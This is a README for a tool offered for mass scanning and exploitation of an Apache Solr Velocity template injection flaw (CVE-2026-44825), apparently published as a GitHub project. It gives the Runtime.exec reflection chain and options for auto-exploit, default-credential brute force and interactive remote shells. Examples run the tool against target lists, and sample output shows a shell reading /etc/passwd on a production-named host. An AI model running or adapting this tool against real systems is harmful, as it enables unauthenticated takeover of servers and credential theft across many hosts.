
☄️ Mass reconnaissance & exploitation framework for Apache Solr CVE-2026-44825 — Velocity template injection to RCE
CVE-2026-44825 is a critical-severity vulnerability in Apache Solr that allows attackers to achieve unauthenticated Remote Code Execution (RCE) through Velocity template injection.
Apache Solr's /select endpoint accepts a wt=velocity parameter that renders user-supplied Velocity templates. When the Velocity Response Writer is enabled (or can be enabled via configuration API), an attacker can inject a malicious template that calls java.lang.Runtime.exec(), executing arbitrary system commands with the privileges of the Solr process.
| Vector | Severity | Impact |
|---|---|---|
| Unauthenticated RCE | 9.8 (Critical) | Full system compromise |
| Authenticated RCE | 8.8 (High) | Post-auth code execution |
| Information Disclosure | 5.3 (Medium) | Core/collection enumeration |
Apache Solr bundles Apache Velocity as an optional template engine for response rendering. The vulnerability lies in Solr's VelocityResponseWriter which processes user-controlled template parameters without adequate sanitization, allowing direct invocation of Java reflection APIs:
Java Reflection Chain:
vtl → Class.forName("java.lang.Runtime") → getRuntime().exec(cmd)
| Apache Solr Version | Status | Notes |
|---|---|---|
| 9.4.0 – 9.10.1 | 🔴 Vulnerable | Active exploitation in the wild |
| 10.0.0 | 🔴 Vulnerable | Initial 10.x release affected |
| 10.0.1+ | 🟢 Patched | Fix backported |
| 9.10.2+ | 🟢 Patched | Patch release available |
| ≤ 9.3.x | 🟢 Not Affected | Velocity Response Writer not present |
| 8.x (all) | 🟢 Not Affected | No Velocity support |
Note: Version checks are performed automatically by parsing
/admin/info/systemJSON response.
🔍 Reconnaissance
|
💀 Exploitation
|
# Clone the repository
git clone https://github.com/shinthink/solrradar.git
cd solrradar
# Install dependencies
pip install -r requirements.txt
# Verify
python solr_scanner.py --help
requests>=2.28.0
urllib3>=1.26.0
Only standard libraries +
requests. No exotic dependencies.
CVE-2026-44825 Apache Solr Scanner
-t, --target Single target URL or IP[:port]
-f, --file File containing targets (one per line, # for comments)
--exploit Auto-exploit if vulnerable credentials are found
--rce Launch interactive shell after authentication
-u, --user Username for Basic Auth
-pw, --password Password for Basic Auth
-o, --output JSON output file path (default: solr_results.json)
-w, --workers Number of concurrent threads (default: 30)
-T, --timeout HTTP request timeout (seconds) (default: 8)
# Single target
python solr_scanner.py -t 192.168.1.100:8983
# Single target with custom path
python solr_scanner.py -t http://example.com/solr
# Mass scan from file
python solr_scanner.py -f targets.txt -o results.json
# targets.txt — supports comments and blank lines
192.168.10.10:8983
192.168.10.20:8983
http://solr-target.internal/solr
192.168.1.0/24 # (CIDR not supported; pre-expand with external tool)
# Scan + auto-exploit if creds found
python solr_scanner.py -f targets.txt --exploit
# Known credentials + interactive shell
python solr_scanner.py -t target:8983 --rce -u admin -pw SolrRocks
# Auto brute-force + shell on success
python solr_scanner.py -t target:8983 --rce
$ python solr_scanner.py -f targets.txt
CVE-2026-44825 Apache Solr Scanner
Targets: 3 | Threads: 30 | Timeout: 8s
Scanning...
[Solr 8.11.2] http://192.168.10.10:8983/solr
[Solr 8.11.2] http://192.168.10.20:8983/solr
Cols (no auth): ['authority', 'dfa', 'oai', 'search']
[Solr 9.4.1] VULN +Auth http://solr-target.internal/solr
Done. Total:3 | Solr:3 | Vuln:1
All 3 targets detected. The 9.4.1 instance is flagged vulnerable with Basic Auth enabled.
$ python solr_scanner.py -t solr-target.internal
CVE-2026-44825 Apache Solr Scanner
[Solr 9.4.1] VULN +Auth http://solr-target.internal/solr
[!] admin:SolrRocks
Cols: ['cms', 'users', 'search', 'analytics']
Default credential
admin:SolrRocksgrants access to Solr admin APIs. Four collections discovered.
$ python solr_scanner.py -t target:8983 --rce -u admin -pw SolrRocks
CVE-2026-44825 Apache Solr Scanner
[+] admin:SolrRocks
solr$ id
uid=8983(solr) gid=8983(solr) groups=8983(solr)
solr$ hostname
solr-prod-cms-01.internal
solr$ whoami
solr
solr$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
solr:x:8983:8983:Solr:/var/solr:/sbin/nologin
...
solr$ exit
Full interactive shell access with the privileges of the Solr Java process.